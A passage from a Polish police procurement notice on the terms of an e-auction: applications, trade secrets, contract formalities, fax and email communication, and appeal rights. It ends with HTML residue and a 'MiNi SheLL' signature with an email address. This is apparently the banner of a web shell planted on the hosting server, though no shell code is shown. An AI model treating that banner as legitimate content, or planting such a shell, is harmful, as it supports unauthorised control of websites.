wynikać z samej umowy spółki cywilnej dołączonej do wniosku. 7. Wszelkie miejsca, w którychWykonawca naniósł poprawki, zmiany muszą być parafowane przez osobę podpisującą wniosek (osobęuprawnioną). 8. Wszelkie dokumenty składane na papierze światłoczułym uznane zostaną za nieważne. 9.Wnioski o dopuszczenie do udziału w postępowaniu są jawne od dnia poinformowania o wynikach ocenyspełniania warunków udziału w postępowaniu (art. 96 ust 3 ustawy PZP). Nie ujawnia się informacjiumożliwiających identyfikację Wykonawcy podczas licytacji (login) aż do momentu jej zamknięcia orazinformacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwejkonkurencji, jeżeli Wykonawca, nie później niż w terminie składania wniosku zastrzegł, że nie mogą byćone udostępniane oraz wykazał, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. 10. JeżeliWykonawca będzie dołączał do wniosku o dopuszczenie do udziału w postępowaniu dokumentyzawierające tajemnice przedsiębiorstwa winien to zrobić dodatkowej zabezpieczonej kopercie, z opisemINFORMACJE STANOWIĄCE TAJEMNICĘ PRZEDSIĘBIORSTWA oraz załączyć dokumentywskazujące, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Wykonawca zastosujepowyższą procedurę także w przypadku składania informacji stanowiące tajemnicę przedsiębiorstwa poterminie składania wniosków. 11. Podmiot prowadzący działalność gospodarczą jako osoba fizyczna,osoba prawna albo jednostka organizacyjna nie posiadająca osobowości prawnej, może złożyć tylko jeden wniosek o dopuszczenie do udziału w postępowaniu, sam lub jako Partner Konsorcjum firm. 12. Wprzypadku złożenia przez jednego Wykonawcę dwóch lub więcej wniosków o dopuszczenie do udziału wpostępowaniu Zamawiający uzna złożenie wniosku za ważne i dopuści Wykonawcę do udziału wpostępowaniu na podstawie wszystkich złożonych wniosków. IV INFORMACJA OFORMALNOŚCIACH, JAKIE POWINNY ZOSTAĆ DOPEŁNIONE PO PRZEPROWADZENIULICYTACJI W CELU ZAWARCIA UMOWY W SPRAWIE ZAMÓWIENIA PUBLICZNEGO. 1. Przedzawarciem umowy Wykonawca dostarcza Zamawiającemu wypełniony formularz ofertowy - załącznik nr4 do ogłoszenia 2. Błędne wypełnienie formularza ofertowego, będzie skutkowało wezwaniem Wykonawcy do przedłożenia prawidłowego formularzaofertowego, a w przypadku odmowy jego poprawieniaZamawiający uzna, iż Wykonawca uchyla się od zawarcia umowy w sprawie zamówienia publicznego ibędzie miał zastosowanie art. 94 ust. 3 ustawy Prawo Zamówień Publicznych. 3. Umowa zawarta zWykonawcą będzie realizowana w oparciu o cenę wskazaną w formularz ofertowym. 4. W przypadku zwycięstwa w licytacji Wykonawcy będącego spółką zograniczoną odpowiedzialnością, której wartość oferty przewyższa dwukrotnie wysokość kapitałuzakładowego Wykonawca zobowiązany jest najpóźniej w dniu podpisania umowy do przedłożeniauchwały wspólników lub odpisu umowy spółki wyrażającej zgodę na zaciągnięcie takiego zobowiązania(art. 230 Kodeksu Spółek Handlowych). Powyższe dotyczy również Wykonawców ubiegających sięwspólnie o udzielenie zamówienia publicznego. 5. W przypadku zwycięstwa w licytacji przezWykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego przed podpisaniemumowy konieczne jest przedłożenie umowy konsorcjum, która będzie regulować wzajemną współpracęWykonawców, czyli zawierać postanowienia dotyczące m.in. realizacji poszczególnych częścizamówienia, sposobu dokonywania rozliczeń. Zgodnie z treścią art. 141 ustawy PZP Wykonawcyubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanieumowy. Zasady solidarnej odpowiedzialności zostały uregulowane art. 366 § 1 Kodeksu cywilnego.Umowa regulująca współpracę podmiotów występujących wspólnie (konsorcjum) ma m.in.: upoważniaćjednego z członków konsorcjum - Lidera - jako osobę prawną i reprezentującą go wskazaną osobęfizyczną, do występowania w imieniu każdego z pozostałych Partnerów we wszystkich sprawachzwiązanych z umową; stwierdzać, że Partnerzy będą odpowiedzialni solidarnie za całość podjętychzobowiązań w ramach realizacji zamówienia; być zawarta na czas trwania umowy, aż do ostatecznegowygaśnięcia obowiązków i praw wobec Zamawiającego; być zawarta w formie pisemnej. 6. W przypadkupowierzenia części zamówienia podwykonawcy zgodnie z oświadczeniem złożonym na wniosku o dopuszczeniedo udziału w postępowaniu. 7. Szczegółowe wymogi dot. podwykonawstwa w trakcie realizacjizamówienia zostały uregulowane we projekcie umowy, której wzór stanowi załącznik nr 2 do ogłoszenia. 8.Wykonawca jest zobligowany przed zawarciem umowy do przekazania informacji dotyczącej imion inazwisk oraz nr uprawnień osób, które będą pełniły funkcje wskazane we wzorze umowy. VINFORMACJE O SPOSOBIE POROZUMIEWANIA SIĘ ZAMAWIAJĄCEGO Z WYKONAWCAMIWRAZ ZE WSKAZANIEM PRZEZ ZAMAWIAJĄCEGO OSÓB UPRAWNIONYCH DOPOROZUMIEWANIA SIĘ Z WYKONAWCAMI: 1. Wszelkie oświadczenia, wnioski, zawiadomieniaoraz informacje Zamawiający i Wykonawcy przekazują pisemnie do momentu otwarcia licytacji. 2.Oświadczenia, pisma, wnioski (za wyjątkiem wniosku o dopuszczenie do udziału w postępowaniu),zawiadomienia oraz informacje przekazane za pomocą faksu lub drogą elektroniczną uważa się zazłożone przez Wykonawcę w terminie, jeżeli ich treść dotarła do adresata przed upływem terminu izostała niezwłocznie potwierdzona na piśmie doręczone osobiście lub pocztą pod adres: KomendaWojewódzka Policji w Katowicach Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19.UWAGA: Zamawiający nie uzna za skuteczne przekazanie w wyznaczonym terminie wniosku odopuszczenie do udziału w postępowaniu przekazanego drogą elektroniczną lub za pomocą faksu,uzupełnienia wniosku o dopuszczenie do udziału w postępowaniu o brakujące dokumenty w przypadkuprzekazania tych dokumentów wyłącznie drogą elektroniczną lub za pomocą faksu. Uzupełnianedokumenty muszą zostać przekazane w formie papierowej (oryginał lub kserokopia poświadczona zazgodność z oryginałem zgodnie ze wskazaniem na wezwaniu do uzupełnienia). 3. Zamawiającyprzekazuje wszelkie pisma za pomocą faksu lub pocztą elektroniczną zgodnie z pkt 4 oraz niezwłoczniepotwierdza pocztą. Terminy wyznaczone przez Zamawiającego na dokonanie poszczególnych czynnościprzez Wykonawcę liczone są od dnia przekazania pisma za pomocą faksu lub pocztą elektronicznązgodnie z pkt. 4. 4. Wykonawcy zobowiązani są do wskazania we wniosku o dopuszczenie do udziału wpostępowaniu, załącznik nr 1 do ogłoszenia numeru telefonu oraz numeru faksu lub adresu pocztyelektronicznej, na który Zamawiający będzie przesyłał Wykonawcy wszelkie pisma przekazywane wramach postępowania. Wykonawca wybiera faks albo pocztę elektroniczną według własnego uznania. Wprzypadku wpisania przez Wykonawcę zarówno numeru faksu jak i adresu poczty elektronicznejZamawiający będzie przesyłał zeskanowane dokumenty pocztą elektroniczną. 5. Wykonawca ponosipełną odpowiedzialność za odbieranie przesyłanej poczty elektronicznej. W przypadku zaniechaniaodebrania przesłanej poczty Wykonawca ponosi wszelkie wynikające z tego skutki. Zamawiający niewymaga potwierdzenia otrzymania przesyłanego pisma drogą elektroniczną. 6. W przypadku wyboruprzez Wykonawcę jako drogi otrzymywania pism nadawanych przez Zamawiającego za pomocą faksuWykonawca ponosi odpowiedzialność za sprawdzenie kompletności i czytelności otrzymania przesłanegopisma. Brak kompletności lub czytelności Wykonawca niezwłocznie zgłasza Zamawiającemu telefonicznie na nr 32 200 20 50. Za dowód skutecznego przesłania pisma do Wykonawcy za pomocąfaksu Zamawiający uznaje potwierdzenie przesłania faksowego OK na numer podany przez Wykonawcęna wniosku o dopuszczenie do udziału w postępowaniu i wykazany na potwierdzeniu faksowym.Zamawiający nie wymaga potwierdzenia otrzymania przekazywanego pisma za pomocą faksu. 7.Wykonawca zobowiązany jest do powiadomienia Zamawiającego w przypadku zmiany numeru telefonu,faksu lub adresu poczty elektronicznej, pod który Zamawiający ma przesyłać pisma. W przypadku niedokonania powiadomienia Zamawiającego, przesłanie pisma na numer faksu lub pod adres pocztyelektronicznej wskazany na wniosku o dopuszczenie do udziału w postępowaniu zgodnie z zasadamiwskazanymi powyżej uważa się za skutecznie dokonane. 8. Zaproszenia do udziału w licytacji zostanąprzekazane Wykonawcom zgodnie z wybraną drogą porozumiewania się (faksem lub pocztąelektroniczną) i potwierdzone pocztą. 9. Przesyłanie wszelkich oświadczeń, pism, wniosków,zawiadomień oraz informacji za pomocą faksu lub drogą elektroniczną do Komendy WojewódzkiejPolicji w Katowicach Zespół Zamówień Publicznych może odbywać się tylko w dniach roboczych (odponiedziałku do piątku) w godzinach 7.30-15.30 na numer faksu 32 200 20 60 lub na adres email:zamowienia@ka.policja.gov.pl Uwaga: W przypadkuprzesłania dokumentu w dniu wolnym od pracy zostanie on zarejestrowany u Zamawiającego wpierwszym następującym dniu roboczym z wpływem wynikającym z daty i godziny faktycznegootrzymania korespondencji 10. Od momentu otwarcia do momentu zamknięcia licytacji Zamawiający iWykonawcy wszelkiego rodzaju wnioski, oświadczenia i inne informacje przekazują drogą elektronicznąza pośrednictwem platformy licytacyjnej; wiadomości przekazywane Wykonawcom będą widoczne wzakładce moje wiadomości. 11. Wyjaśnienia nie będą udzielane telefonicznie. VI POUCZENIE OŚRODKACH OCHRONY PRAWNEJ PRZYSŁUGUJĄCYCH WYKONAWCY W TOKUPOSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA. 1.Wykonawcy w toku postępowania o udzieleniezamówienia przysługują środki ochrony prawnej określone w dziale VI ustawy Prawo zamówieńpublicznych. 2.Wykonawcy, a także innemu podmiotowi jeżeli ma lub miał interes w uzyskaniu danegozamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez Zamawiającego przepisówustawy Pzp przysługuje odwołanie wobec czynności: - określenia warunków udziału w postępowaniu -wykluczenia odwołującego z postępowania o udzielenie zamówienia - odrzucenia oferty odwołującego -opisu przedmiotu zamówienia - wyboru najkorzystniejszej oferty 3.Odwołanie wnosi się w terminie 5 dniod dnia przesłania informacji o czynności zamawiającego stanowiącej podstawę jego wniesienia --jeżelizostały przesłane drogą elektroniczną lub faksową albo w terminie 10 dni -- jeżeli zostały przesłane winny sposób. 4.Odwołanie wobec treści ogłoszenia o zamówieniu, a jeżeli postępowanie jest prowadzone w trybie przetargu nieograniczonego, także wobec postanowień specyfikacji istotnych warunkówzamówienia, wnosi się w terminie: 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie ZamówieńPublicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej. 5.Odwołaniewobec czynności innych niż określone w ust. 2 i 3 wnosi się w terminie 5 dni od dnia, w którym powziętolub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościachstanowiących podstawę jego wniesienia. 6.Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczejw formie pisemnej albo elektronicznej opatrzonej bezpiecznym podpisem elektronicznymweryfikowanym za pomocą ważnego kwalifikowanego certyfikatu lub równoważnego środka,spełniającego wymagania dla tego rodzaju podpisu.. 7.Odwołujący przesyła kopię odwołaniaZamawiającemu przed upływem terminu do wniesienia odwołania w taki sposób aby mógł on zapoznaćsię z jego treścią przed upływem tego terminu. 8.Zamawiający przesyła niezwłocznie, nie później niż wterminie 2 dni od dnia otrzymania, kopie odwołania innym Wykonawcom uczestniczącym wpostępowaniu o udzielenie zamówienia publicznego, a jeżeli odwołanie dotyczy treści ogłoszenia lubpostanowień SIWZ, zamieszcza ją również na stronie internetowej Zamawiającego, wzywającWykonawców do przystąpienia do postępowania odwoławczego. 9.W przypadku wniesienia odwołaniapo upływie terminu składania ofert bieg terminu związania ofertą ulega zawieszeniu do czasu ogłoszeniaprzez Izbę orzeczenia. 10.Na czynności na które nie przysługuje odwołanie na podstawie art. 180 ust. 2ustawy Pzp, Wykonawca może w terminie przewidzianym na wniesienie odwołania poinformowaćZamawiającego o niezgodnej z przepisami ustawy czynności podjętej przez Zamawiającego lubzaniechaniu czynności do której jest on zobowiązany.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com